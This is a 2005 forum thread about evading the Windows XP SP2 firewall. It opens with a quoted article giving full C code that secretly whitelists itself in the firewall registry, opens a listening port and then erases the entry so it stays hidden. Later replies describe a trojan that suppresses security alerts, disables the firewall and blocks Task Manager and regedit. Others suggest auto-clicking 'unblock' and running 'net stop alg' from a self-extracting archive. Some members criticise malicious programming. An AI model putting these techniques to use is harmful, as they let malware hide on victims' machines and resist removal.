Author Topic: SP2 Firewall  (Read 9692 times)

0 Members and 1 Guest are viewing this topic.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
SP2 Firewall
« on: September 08, 2005, 09:49:41 am »
This article is about how to open up a listening port from Windows XP SP2 without being logged/listed as open:

Quote
1.9.2005
Mark Kica
crusoe@alexandria.cc
FEI AI Technical University Kosice   
#Dedicated to Katka H. from Levoca



     How to avoid of detection of server application on Windows XP SP2 firewall

###############################################################################
#Q:How safe is Windows XP SP2 firewall ?
#A:Not very...

 This trick use only modification of registry keys.Windows Xp SP2 firewall have
list of allowed program in register which are not blocked.If you add new key
to it,your server (malware or trojane) can run freely.

also server can be invisible in following list 

start->control panel->windows firewall->exceptions


It will become invisible from this list because after you create socket,you can remove registry string value of your server and connection wont be aborted

Other way how to bypass SP2 firewall ,is to create trojan not as server,but
as client.

##################################################################

http://taekwondo-itf.szm.sk/bugg.zip

Test :

#c:\bugg.exe          Server running on port 2001

connect to server with :

#telnet localhost 2001



##################################################################

Our Registry path is

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List


and there you can create string value

Value name                    Value           

C:\chat.exe  ........ C:\chat.exe:*:Enabled:chat


NO SPACES!!! in key name etc.  _C:\chat.exe___

#################################################################
Tested on Windows XP 2005 center media edition with integrated SP2

Source code
(server use ezsocket lib)

#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"

int main( int argc, char *argv [] )
    {
    char buffer[1024];
    char filename[1024];

    HKEY hKey;
    int i;

    GetModuleFileName(NULL, filename, 1024);

    strcpy(buffer, filename);
    strcat(buffer, ":*:Enabled:");
    strcat(buffer, "bugg");

    RegOpenKeyEx(

       HKEY_LOCAL_MACHINE,
       "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",
       0,
       KEY_ALL_ACCESS,
       &hKey);

    RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
   
    int temp, sockfd, new_fd, fd_size;
    struct sockaddr_in remote_addr;

    fprintf(stdout, "Simple server example with Anti SP2 firewall trick    \n");
    fprintf(stdout, "             This is not trojan                       \n");
    fprintf(stdout, "             Opened port is :2001                      \n");
    fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
    fprintf(stdout, "Dedicated to Katka H. from Levoca                       \n");


    sleep(3);

    if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
        return 0;
       

    for (; ; )
        {
        RegDeleteValue(hKey, filename); 
          fd_size = sizeof(struct sockaddr_in);

        if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
            {
            perror("accept");
            continue;
            }
        temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
        fprintf(stdout, "Sended: Hello World\r\n");
        temp = recv(new_fd, buffer, 1024, 0);
        buffer[temp] = '\0';
        fprintf(stdout, "Recieved: %s\r\n", buffer);
        ezclose_socket(new_fd);
        RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

        if (!strcmp(buffer, "quit"))
            break;
        }


    ezsocket_exit();
   return 0;
    }
 

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: SP2 Firewall
« Reply #1 on: September 08, 2005, 07:00:56 pm »
Thanks, was looking for some information on SP2's firewall recently.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline Joe

  • B&
  • x86
  • Hero Member
  • *****
  • Posts: 10319
  • In Soviet Russia, text read you!
    • View Profile
    • Github
Re: SP2 Firewall
« Reply #2 on: September 11, 2005, 04:57:38 am »
Heh, I wouldn't trust the XP firewall anymore than my headphones, even before this.
I'd personally do as Joe suggests

You might be right about that, Joe.


Offline Koga73

  • Newbie
  • *
  • Posts: 19
  • I'm new here!
    • View Profile
re
« Reply #3 on: September 14, 2005, 10:32:51 pm »
i made a trojan, and to prevent the xp sp2 firewall from doing anything... i just blocked the window name "windows security alert" so it wont display that stupid mesasage. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan i have set by default to block task manager, msconfig, regedit, and windows security alert. So, once its on, its not ez to get off :). And the user can add there own blocks if they want.

Offline Newby

  • x86
  • Hero Member
  • *****
  • Posts: 10877
  • Thrash!
    • View Profile
Re: SP2 Firewall
« Reply #4 on: September 14, 2005, 11:24:23 pm »
Uh, it will not display the message, but I'm guessing that it will still block access.

You should set a loop to detect for that window to pop up, and when it does, find the button that says "unblock" and unblock your program from accessing the internet.
- Newby
http://www.x86labs.org

Quote
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

I'd bet that you're currently bloated like a water ballon on a hot summer's day.

That analogy doesn't even make sense.  Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT. 

Offline Sidoh

  • x86
  • Hero Member
  • *****
  • Posts: 17634
  • MHNATY ~~~~~
    • View Profile
    • sidoh
Re: re
« Reply #5 on: September 15, 2005, 12:53:40 am »
i made a trojan, and to prevent the xp sp2 firewall from doing anything... i just blocked the window name "windows security alert" so it wont display that stupid mesasage. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan i have set by default to block task manager, msconfig, regedit, and windows security alert. So, once its on, its not ez to get off :). And the user can add there own blocks if they want.

How incredibly annoying.  People who program maliciously suck at life.

Offline Koga73

  • Newbie
  • *
  • Posts: 19
  • I'm new here!
    • View Profile
Re: SP2 Firewall
« Reply #6 on: September 15, 2005, 04:20:12 pm »
when the window closes, it doenst block it, or permantly allow it. Just allows it that time, and next time itll ask u again.

Offline Joe

  • B&
  • x86
  • Hero Member
  • *****
  • Posts: 10319
  • In Soviet Russia, text read you!
    • View Profile
    • Github
Re: SP2 Firewall
« Reply #7 on: September 15, 2005, 10:48:06 pm »
Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.
I'd personally do as Joe suggests

You might be right about that, Joe.


Offline Screenor

  • Hero Member
  • *****
  • Posts: 1611
  • My own little world.
    • View Profile
Re: SP2 Firewall
« Reply #8 on: September 18, 2005, 04:01:06 am »
Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.
Seriously, other then not letting you host games on B.net it's really got no purpose.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: SP2 Firewall
« Reply #9 on: September 18, 2005, 10:04:42 am »
It blocks incoming traffic.  That will stop a lot of attacks, such as:
MS03-026 (Dcom -- Blaster worm)
MS04-011 (Lsass -- Sasser worm)
MS05-039 (PnP -- Zotob worm)
and many others. 

It's useful for preventing incoming attcks, like worms, but isn't terribly useful for blocking outbound traffic. 

Offline drka

  • ffdshow > in_mp3.dll
  • Full Member
  • ***
  • Posts: 330
    • View Profile
Re: SP2 Firewall
« Reply #10 on: September 25, 2005, 08:28:15 pm »
Windows Vista is supposed to have its firewall upgraded so that it does

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: SP2 Firewall
« Reply #11 on: September 25, 2005, 08:43:47 pm »
Windows Vista is supposed to have its firewall upgraded so that it does

It does what? A dance? Blocks Sasser? Damn, it better.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline drka

  • ffdshow > in_mp3.dll
  • Full Member
  • ***
  • Posts: 330
    • View Profile
Re: SP2 Firewall
« Reply #12 on: September 25, 2005, 08:47:31 pm »
blocking outgoing connections and maybe will fix the issue where malware can disable it

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: SP2 Firewall
« Reply #13 on: September 25, 2005, 09:49:06 pm »
blocking outgoing connections and maybe will fix the issue where malware can disable it

As long as the user can disable it without a password, so can viruses.  And people don't like having to put in a password, so that probably won't change. 

Offline ink

  • Newbie
  • *
  • Posts: 74
    • View Profile
Re: SP2 Firewall
« Reply #14 on: February 14, 2006, 03:05:10 pm »
XP firewall is easily disabled w/ a archivirus (sfx scripting)
all you have to do is set it to run this before extraction:

C:\Windows\system32\net.exe stop alg

This command will shutdown the "Application Layer Gateway Service" which is responsibly for correct functionality of the firewall.

Offline Eric

  • Full Member
  • ***
  • Posts: 304
  • I'm new here!
    • View Profile
Re: SP2 Firewall
« Reply #15 on: February 14, 2006, 04:10:00 pm »
and requires administrative access.

Offline ink

  • Newbie
  • *
  • Posts: 74
    • View Profile
Re: SP2 Firewall
« Reply #16 on: February 14, 2006, 04:15:07 pm »
Mhm, I'm not a fan of this anyways since it makes it somewhat obvious that the system is compromised, just an example.

Offline Berzerker

  • Newbie
  • *
  • Posts: 23
  • I r t3h l33tsk33t.
    • View Profile
Re: SP2 Firewall
« Reply #17 on: February 15, 2006, 07:31:23 pm »
Windows Vista is supposed to have its firewall upgraded so that it does
Isn't Vista just supposed to come with Windows One Care?



Offline Warrior

  • supreme mac daddy of trolls
  • Hero Member
  • *****
  • Posts: 7503
  • One for a Dime two for a Quarter!
    • View Profile
Re: SP2 Firewall
« Reply #18 on: February 19, 2006, 01:15:38 pm »
One Care is for live.com, Vista comes with Windows Defender (Formerly Windows Anti-Spyware Beta2)
One must ask oneself: "do I will trolling to become a universal law?" And then when one realizes "yes, I do will it to be such," one feels completely justified.
-- from Groundwork for the Metaphysics of Trolling

Offline deadly7

  • 42
  • x86
  • Hero Member
  • *****
  • Posts: 6496
    • View Profile
Re: SP2 Firewall
« Reply #19 on: February 19, 2006, 04:10:59 pm »
One Care is for live.com, Vista comes with Windows Defender (Formerly Windows Anti-Spyware Beta2)
The "Anti-Spyware" that teamed up with Gator?
[17:42:21.609] <Ergot> Kutsuju you're girlfrieds pussy must be a 403 error for you
 [17:42:25.585] <Ergot> FORBIDDEN

on IRC playing T&T++
<iago> He is unarmed
<Hitmen> he has no arms?!

on AIM with a drunk mythix:
(00:50:05) Mythix: Deadly
(00:50:11) Mythix: I'm going to fuck that red dot out of your head.
(00:50:15) Mythix: with my nine

Offline Warrior

  • supreme mac daddy of trolls
  • Hero Member
  • *****
  • Posts: 7503
  • One for a Dime two for a Quarter!
    • View Profile
Re: SP2 Firewall
« Reply #20 on: February 20, 2006, 06:23:10 am »
You mean bought out? Check Defender, it detects and removes it if it is even present. I really don't know why you even start with this *shrug*
One must ask oneself: "do I will trolling to become a universal law?" And then when one realizes "yes, I do will it to be such," one feels completely justified.
-- from Groundwork for the Metaphysics of Trolling